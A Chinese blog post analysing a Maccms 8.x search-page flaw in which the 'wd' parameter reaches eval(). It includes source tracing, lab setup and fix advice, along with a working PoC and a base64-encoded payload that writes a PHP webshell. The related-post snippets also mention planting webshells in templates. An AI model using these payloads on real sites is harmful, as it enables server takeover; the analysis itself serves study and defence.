Maccms8.x 命令执行漏洞分析

最新推荐文章于 2024-08-04 22:21:07 发布
最新推荐文章于 2024-08-04 22:21:07 发布
阅读量7.1k 收藏 1
点赞数 1
分类专栏: 漏洞 文章标签: 漏洞 cms php 视频网站 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeino1/article/details/76376770
版权

这里写图片描述

1. 漏洞描述

  • 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell
  • 影响版本: Maccms8.x

2. 漏洞简介

  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。

  该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句。

3. 漏洞原理分析

3.1  源码分析

  首先我们通过网上已知的payload:URL:http://127.0.0.1/index.PHP?m=vod-searchPOST数据wd={if-A:print(md5(23333))}{endif-A}进行源码跟踪和调试。

这里写图片描述

首先进入index.php进行跟踪,我们可以看到代码中直接将m=vod-search参数进行拆分vod参数和search参数,vod参数是进入的文件路径,search是vod.php的一个选项。

这里写图片描述

进入\inc\module\vod.php页面继续debug,进入method=search条件语句,$wd为我们输入的参数{if-A:print(md5(23333))}{endif-A}

这里写图片描述

继续跟踪可以看到对$tp1数组进行赋值,同时加载\template\paody\html\vod_search.html:

这里写图片描述

继续跟踪\inc\module\vod.php,进行代码走读:

$db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']);
    $tpl->H = loadFile(MAC_ROOT_TEMPLATE."/vod_search.html");
    $tpl->mark();
    $tpl->pageshow();

    $colarr = array('{page:des}','{page:key}','{page:now}','{page:order}','{page:by}','{page:wd}','{page:wdencode}','{page:pinyin}','{page:letter}','{page:year}','{page:starring}','{page:starringencode}','{page:directed}','{page:directedencode}','{page:area}','{page:areaencode}','{page:lang}','{page:langencode}','{page:typeid}','{page:typepid}','{page:classid}');
    $valarr = array($tpl->P["des"],$tpl->P["key"],$tpl->P["pg"],$tpl->P["order"],$tpl->P["by"],$tpl->P["wd"],urlencode($tpl->P["wd"]),$tpl->P["pinyin"],$tpl->P["letter"],$tpl->P['year']==0?'':$tpl->P['year'],$tpl->P["starring"],urlencode($tpl->P["starring"]),$tpl->P["directed"],urlencode($tpl->P["directed"]),$tpl->P["area"],urlencode($tpl->P["area"]),$tpl->P["lang"],urlencode($tpl->P["lang"]),$tpl->P['typeid'],$tpl->P['typepid'] ,$tpl->P['classid']  );

    $tpl->H = str_replace($colarr, $valarr ,$tpl->H);

我们可以看到代码中利用$tpl->H = str_replace($colarr, $valarr ,$tpl->H);语句将$tp1->H中的

`$colarr = array('{page:des}','{page:key}','{page:now}','{page:order}','{page:by}','{page:wd}','{page:wdencode}','{page:pinyin}','{page:letter}','{page:year}','{page:starring}','{page:starringencode}','{page:directed}','{page:directedencode}','{page:area}','{page:areaencode}','{page:lang}','{page:langencode}','{page:typeid}','{page:typepid}','{page:classid}');

`

进行替换,替换后的$tpl->H值为我们之前输入的POC:

这里写图片描述

继续跟进,进入\inc\common\template.php的ifex函数:

function ifex()
        {
            if (!strpos(",".$this->H,"{if-")) { return; }
            $labelRule = buildregx('{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}',"is");
            preg_match_all($labelRule,$this->H,$iar);

            $arlen=count($iar[2]);

            for($m=0;$m<$arlen;$m++){
                $strn = $iar[1][$m]; //该值取的是$iar第二个数组中的值,为“A”
                $strif= asp2phpif( $iar[2][$m] ) ;//该值取的是$iar第三个数组中的值,为“print(md5(23333))”
                $strThen= $iar[3][$m];//该值取的是$iar第四个数组中的值,第一个为“”
                $elseifFlag=false;

                $labelRule2="{elseif-".$strn."";
                $labelRule3="{else-".$strn."}";

                if (strpos(",".$strThen,$labelRule2)>0){
                    $elseifArray=explode($labelRule2,$strThen);
                    $elseifArrayLen=count($elseifArray);
                    $elseifSubArray=explode($labelRule3,$elseifArray[$elseifArrayLen-1]);
                    $resultStr=$elseifSubArray[1];
                    @eval("if($strif){\$resultStr='$elseifArray[0]';\$elseifFlag=true;}");
                    if(!$elseifFlag){
                        for($elseifLen=1;$elseifLen<$elseifArrayLen-1;$elseifLen++){
                            $strElseif=getSubStrByFromAndEnd($elseifArray[$elseifLen],":","}","");
                            $strElseif=asp2phpif($strElseif);
                            $strElseifThen=getSubStrByFromAndEnd($elseifArray[$elseifLen],"}","","start");
                            $strElseifThen=str_replace("'","\'",$strElseifThen);
                            @eval("if($strElseif){\$resultStr='$strElseifThen'; \$elseifFlag=true;}");
                            if ($elseifFlag) {break;}
                        }
                    }
                    if(!$elseifFlag){
                        $strElseif0=getSubStrByFromAndEnd($elseifSubArray[0],":","}","");
                        $strElseif0=asp2phpif($strElseif0);
                        $strElseifThen0=getSubStrByFromAndEnd($elseifSubArray[0],"}","","start");
                        $strElseifThen0=str_replace("'","\'",$strElseifThen0);
                        @eval("if($strElseif0){\$resultStr='$strElseifThen0';\$elseifFlag=true;}");
                    }
                    $this->H=str_replace($iar[0][$m],$resultStr,$this->H);
                }
                else{
                    $ifFlag = false;
                    if (strpos(",".$strThen,$labelRule3)>0){
                        $elsearray=explode($labelRule3,$strThen);
                        $strThen1=$elsearray[0];
                        $strElse1=$elsearray[1];
                        @eval("if($strif){\$ifFlag=true;}else{\$ifFlag=false;}");
                        if ($ifFlag){ $this->H=str_replace($iar[0][$m],$strThen1,$this->H);} else {$this->H=str_replace($iar[0][$m],$strElse1,$this->H);}
                    }
                    else{
                        @eval("if($strif){\$ifFlag=true;}else{\$ifFlag=false;}");
                        if ($ifFlag){ $this->H=str_replace($iar[0][$m],$strThen,$this->H);} else { $this->H=str_replace($iar[0][$m],"",$this->H); }
                     }
                }
            }
            unset($elsearray);
            unset($elseifArray);
            unset($iar);
            if (strpos(",".$this->H,"{if-")) { $this->ifex(); }
        }

可以看到首先对 this>H iar[2][$m]参数是我们要执行的POC,经过asp2phpif进行过滤,这里我们看一下asp2phpif函数的源码:

function asp2phpif($str)
    {
        $str= str_replace("not","!",$str);
        $str= str_replace("==","=",$str);
        $str= str_replace("=","==",$str);
        $str= str_replace("<>","!=",$str);
        $str= str_replace("and","&&",$str);
        $str= str_replace("or","||",$str);
        $str= str_replace("mod","%",$str);
        return $str;
    }

该函数主要对他认为的参数进行替换,可以看到我们需要执行的POC并没有被过滤和替换掉。

这里写图片描述

最后我们可以看到$strif参数并没有再被过滤而是直接执行了eval函数

这里写图片描述

到这就已经debug完所有的流程,也成功的执行了命令print(md5(23333)),如图所示:

这里写图片描述

4. 靶场环境搭建

4.1 环境源码下载

通过github下载Maccms8.x源码https://github.com/yaofeifly/Maccms8.x

4.2 安装Maccms

  • 在Linux下直接安装Apache+Mysql+php环境,然后将源码导入到/var/www/html文件夹下。
  • 启动Apache服务,在浏览器直接访问Maccms路径,进入安装页面。配置好CMS需要的环境

这里写图片描述

  • 配置好数据连接,用户设置等,直接安装即可
  • 访问http://localhost/maccms8/成功出现CMS首页。安装成功

4.3 漏洞复现(getshell)

1.访问Maccms网站,进入search页面。

2.利用Firefox浏览器发送POST数据包或直接用Python编写脚本进行发送POST数据包

3.构造一句话木马payload:

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

进行攻击,该payload是直接生成一个c.php一句话木马文件,连接密码为c。

这里写图片描述

4.菜刀或直接用Firefox连接一句话,执行命令。

这里写图片描述

5. 修复意见

  升级Maccms8.x到最新版本,或手动添加规则过滤非法字符。

fly小灰灰
关注
专栏目录
漏洞复现】maccms苹果cms 命令执行漏洞
失心少年
11-16 2175
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站
苹果cms php获取id,苹果CMS全版本getshell打包第一弹
weixin_34517745的博客
03-19 3959
### 简要描述:苹果CMS全版本后台getshell打包苹果cms官网http://www.maccms.com/### 详细说明:漏洞一后台模板任意后缀文件[](https://images.seebug.org/upload/201402/2809474390f6d06521ddd092ec7c755cfc8375f2.jpg)chrome审查元素吧value里的.html改成.php[](...
常见的cms漏洞
最新发布
qq_68186313的博客
08-04 1398
2、点击【生成】--》【更新主页HTML】--》将主页位置修改为【.·/index.php】--》点击【生成静态】--》点击【更新主页】再次访问站点首页可发现变化。1、接着上一个环境使用,将带有后门的文件加入到主题中并将主题压缩为ZP文件点击【外观】-》【主题】--》【添加】--》【上传主题】--》【浏览】--》【现在安装】1、与WPCMS类似,直接修改模板拿WebShell..点击【模板】--》【默认模板管理】一》【index.htm】---》【修改】在文件修改中添加一句话代码如下。
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
漏洞复现】六、maccms 远程命令执行(CVE-2017-17733)
weixin_52351575的博客
09-21 649
这个马子进行了编码绕过,通过base64编码写入一句话木马
苹果cms8.x 命令执行漏洞本地攻击演示
qq_42383069的博客
11-01 4676
新出道信息安全爱好者,有很多需要学习的地方,愿有一天能追上大佬步伐。 好了,下面进入正题,上半年6月份参加了铁人三项赛,线下web题为Maccms8.x ,当时也是通过团队协作以及百度资源成功破解服务器,现在我搭建了靶机,具体步骤写出来。 1.准备:phpstudy+Maccms8.x 源码 搭建成功后我们先来访问一下 因为Maccms8.x 存在命令执行漏洞,所以我们先点击searc...
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 299
苹果maccms网站漏洞进行修复解决方法教程
Maccms8.x.zip
03-07
Maccms8.x:构建高效视频CMS系统的关键要素与实践》 Maccms8.x是一款基于PHP开发的开源视频内容管理系统(CMS),专为搭建专业级的视频网站而设计。该系统的出现,极大地简化了视频网站的建设和管理流程,为用户...
最新解密苹果MacCms播放器playerJS 去播放器广告 基于maccms8.x 2017.09.27
05-20
MacCms源文件里的player.js是加密的,加密的文件内置小广告比牛皮癣还多。 不但影响使用,且不方便修改,所以,有了解密文件,福音就来了。 下载后,在解密后的播放器文件里,自己把加密文件的外部链接换成自己的...
Maccms8.x整合Ckplayer6.4.rar
09-11
Maccms8.x与Ckplayer6.4的整合详解》 Maccms8.x是一款基于PHP开发的开源视频网站管理系统,它以其强大的视频管理功能和高效的运行效率,在众多内容管理系统中脱颖而出。Ckplayer则是一款知名的网页Flash视频...
苹果cms电影程序MacCms v8.x UTF8 bulid2017.04.30
12-01
苹果cms电影程序MacCms是一套采用ASP+MSSQL/ACCESS (PHP+MYSQL)环境下运行的完善而强大的视频电影系统。 经过近多年的开发经验和技术积累,苹果MacCMS视频电影程序已逐步走向成熟,在易用性
MacCMS8.x整合ckplayer6.7
11-05
MacCMS8.x整合ckplayer6.7 直接覆盖目录即可 后台清理缓存 然后添加视频即可
Maccms8.x整合ckplayer6.6
11-05
Maccms8.x整合ckplayer6.6覆盖目录即可使用,进入后台清理缓存,然后添加视频就可以看见播放器选项。
苹果cms电影程序MacCms v8.x UTF8 bulid2017.09.27
10-22
苹果cms电影程序MacCms是一套采用ASP+MSSQL/ACCESS (PHP+MYSQL)环境下运行的完善而强大的视频电影系统。经过近多年的开发经验和技术积累,苹果MacCMS视频电影程序已逐步走向成熟,在易用性和功能上已经成为同行中的佼佼者。程序体积小->优化程序代码,运行速度快->高效的缓存处理,只要普通的虚拟主机就可以完美搭建起来,建站成本非常低。仿MVC模板分离,内置标签,asp自定义函数标签接口,强大的自定义采集功能,只要你会HTML就可以轻松做出个性化的网站。程序易用性和功能上一直以来都积极采纳广大站长提出的各种好的建议,迅速响应各种紧急问题,我们的服务理念贯穿其中,保证每一位站长每一个环节都可以从容应对。1,特有的静态生成模式,数据和分类的相关数据全部以变量形式提供,你可以自由组合成无数种路径方式。 2,特有的会员权限系统,可以控制会员浏览列表、内容页面、播放页面的权限,高级会员可以继承低级会员的权限。3,特有的播放程序,可以自由完美的切换到远程美化版播放器或者本地播放器,无须重新生成数据。4,特有的缓存控制模式,完美的利用内存和文件缓存,让系统达到时刻高速运行的状
苹果cms电影程序MacCms v8.x UTF8 bulid2016.11.30
12-03
苹果cms电影程序MacCms是一套采用ASP+MSSQL/ACCESS (PHP+MYSQL)... 经过近多年的开发经验和技术积累,苹果MacCMS视频电影程序已逐步走向成熟,在易用性和功能上已经成为同行中的佼佼者。 程序体积小-优化程序代码,运行
maccms代码审计——前台sql注入漏洞
willow_liang的博客
11-06 2033
漏洞存在路径:C:\phpstudy\WWW\maccms\inc\common\function.php第572行的htmlEncode函数 审计过程: 1.在C:\phpstudy\WWW\maccms\inc\module\vod.php93-98 2.跟进图中的be方法
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 379
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
Maccms8.x 命令执行分析
Matthew
05-24 6441
在很多地方看到有这个漏洞,自己学着分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}} 在index.php这里主要是进行模板的路由规则替换,vod-search就会拆分成vod和search,然后载入v
maccms 10 player.js解密
10-07
maccms 10 player.js 是一个用于视频播放的javascript文件,解密它可能有以下几种方法。 首先,可以尝试查看该文件是否有相关的解密方法。有可能在该文件中有一些注释或者函数名字暗示了解密的方法。如果是这种情况,可以根据这些提示去解密文件。 其次,可以尝试使用相关的工具进行解密。有一些在线工具或者软件可以对javascript文件进行解密。但是需要注意的是,这种解密方法可能并不适用于所有的加密算法,特别是一些定制的加密算法。 另外,可以尝试进行逆向工程分析。这种方法需要对javascript文件进行深度的分析和理解。通过分析代码的结构、变量和函数的使用等,可以逐渐推导出解密的逻辑。 最后,如果以上方法都无法解密该文件,有可能该文件使用了强大的加密算法或者防护措施。在这种情况下,解密会变得非常困难,甚至可能需要复杂的技术手段和高级知识。 总的来说,解密 maccms 10 player.js 需要对javascript代码的分析能力和相关的解密知识。具体的解密方法需要根据文件的特点和加密方式来确定。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值